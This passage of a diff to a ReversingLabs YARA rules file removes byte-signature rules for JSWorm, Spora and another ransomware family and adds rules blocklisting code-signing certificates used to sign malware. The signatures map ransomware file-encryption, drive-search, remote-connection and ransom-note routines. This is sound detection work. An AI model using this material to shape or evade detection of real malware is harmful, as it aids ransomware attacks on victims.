-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ??
-            57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8
-            ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
-            50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0
-            75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ??
-            A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88
-            41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ??
-            ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB
-            ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-        }
-		$encrypt_files_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF
-            15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ??
-            89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03
-            F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ??
-            50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D
-            ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
-        }
-		$remote_connection_v2 = {
-            55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ??
-            53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ??
-            8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$drop_ransom_note_v2_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ??
-            ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46
-            ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04
-            33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46
-            84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56
-            53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
-        }
-		$drop_ransom_note_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ??
-            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ??
-            F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ??
-            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ??
-            6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84
-            C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ??
-            ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66
-            90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ??
-            56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51
-            57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $encrypt_files_v1_p* ) ) and ( all of ( $find_files_v1_p* ) ) and ( $create_scheduled_task_v1 ) and ( $remote_connection_v1 ) and ( $check_mutex_v1 ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( $remote_connection_v2 ) and ( all of ( $drop_ransom_note_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aidem Media Limited" and pe.signatures [ i ] . serial == "57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects JSWorm ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4702cc3-1e08-5631-b832-5d28cb92a819"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12628-L12646"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38"
+		logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "JSWorm"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ??
-            0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73
-            ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6
-            85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8
-        }
-		$find_drives = {
-            68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01
-            41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B
-            CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66
-            89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85
-            ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3 E8 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ??
-            72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89
-            85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53
-            FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
-        }
-		$encrypt_files_p2 = {
-            8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ??
-            6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0
-            C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ??
-            50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56
-            FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_drives and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUPITER-STROI, OOO" and ( pe.signatures [ i ] . serial == "00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures [ i ] . serial == "ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" ) and 1491177600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Spora ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "94128695-0206-5c04-b792-34400f8ce890"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12648-L12664"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0"
+		logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Spora"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE
-            ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F
-            82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75
-            ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B
-            45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ??
-            ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15
-            ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF
-            75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57
-            FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57
-            57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ??
-            57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50
-            53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ??
-            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2
-        }
-		$create_key_file = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45
-            ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0
-            ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ??
-            53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A
-            ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68
-            ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ??
-            ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45
-            ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF
